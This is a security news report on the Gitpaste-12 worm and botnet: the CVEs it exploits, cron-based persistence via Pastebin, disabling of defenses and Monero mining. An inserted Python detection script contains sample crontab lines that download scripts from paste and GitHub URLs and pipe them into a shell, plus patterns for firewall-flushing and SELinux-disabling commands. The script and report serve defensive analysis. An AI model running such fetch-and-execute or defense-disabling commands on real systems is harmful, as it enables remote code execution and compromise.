Researchers at Juniper Threat Labs uncovered a new worm and botnet, which they named Gitpaste-12 because it uses GitHub and Pastebin to host component code and has at least 12 active attack modules.
The researchers said they discovered the Gitpaste-12 attacks on October 15 and reported the Pastebin URL and git repo, both of which were closed on Oct. 30, 2020. This should stop the propagation of the botnet, the researchers noted.
According to the report, the Gitpaste-12 botnet has 12 attack modules available, though the presence of test code for possible future modules suggests that the malware is still in the development stage. At present, Gitpaste-12 targets Linux-based x86 servers, as well as ARM- and MIPS-based Linux IoT devices.
To compromise targets, the malware uses exploits for known vulnerabilities in various products, including Tenda and Huawei routers (CVE-2017-17215), the Realtek SDK (CVE-2014-8361) and Apache Struts (CVE-2017-5638), among others, and also attempts to brute-force passwords.
“Immediately after compromising a system, the malware sets up a cron job it downloads from Pastebin, which in turn calls the same script and executes it again each minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet. The main shell script uploaded during the attack to the victim machine starts to download and execute other components of Gitpaste-12,” the report explains.
The malware then downloads and executes components from GitHub. Next, Gitpaste-12 prepares its target environment by disabling system defenses such as firewall rules and common threat prevention and monitoring software. The researchers discovered a script containing comments in the Chinese language and commands to block security tools. In one instance, commands disable cloud security agents, suggesting the threat actor meant to target public cloud infrastructure provided by Alibaba Cloud and Tencent.
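As an added defender-side illustration (not code from the Juniper report or the malware), the script below flags the persistence pattern described above, a cron entry that re-fetches a script from a paste or code-hosting site every minute and pipes it into a shell, and lists the defense-disabling commands found in a downloaded script. The crontab content, URL paths and command patterns are constructed for the demo, not real Gitpaste-12 indicators.

```python
import re
# Constructed crontab content for the demo (not taken from the report);
# the URL paths are placeholders, not real Gitpaste-12 indicators.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/local-backup.sh
* * * * * curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh
*/10 * * * * wget -q -O - https://raw.githubusercontent.com/PLACEHOLDER/init.sh | bash
"""
PASTE_HOSTS = ("pastebin.com", "raw.githubusercontent.com", "github.com")
FETCH_CMD = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
# Commands a downloaded stager might use to disable host defenses (constructed list).
TAMPER_PATTERNS = {
    "flushes firewall rules": re.compile(r"\biptables\s+(-F|--flush)\b"),
    "disables SELinux enforcement": re.compile(r"\bsetenforce\s+0\b"),
    "stops a service": re.compile(r"\b(systemctl|service)\s+stop\b"),
}

def parse_cron_line(line):
    """Return (schedule_fields, command), or None for blank, comment or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 5)
    return (parts[:5], parts[5]) if len(parts) == 6 else None

def suspicious_cron_entries(crontab_text):
    """Flag entries showing at least two of: paste-site download, pipe-to-shell, every-minute schedule."""
    findings = []
    for line in crontab_text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, cmd = parsed
        reasons = []
        if FETCH_CMD.search(cmd) and any(h in cmd for h in PASTE_HOSTS):
            reasons.append("downloads from paste/code-hosting site")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes download into a shell")
        if all(f == "*" for f in schedule):
            reasons.append("runs every minute")
        if len(reasons) >= 2:
            findings.append((cmd, reasons))
    return findings

def defense_tampering(script_text):
    """List the defense-disabling commands present in a downloaded script's text."""
    return [label for label, rx in TAMPER_PATTERNS.items() if rx.search(script_text)]
```

Running `suspicious_cron_entries` over `crontab -l` output or the files under `/etc/cron.d` gives a quick triage list; the two-reason threshold keeps ordinary scheduled downloads from being flagged on their own.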
The research team said that the malware’s functions also include an ability to mine Monero cryptocurrency and spread to other machines.
“No malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization,” Juniper Threat Labs concluded.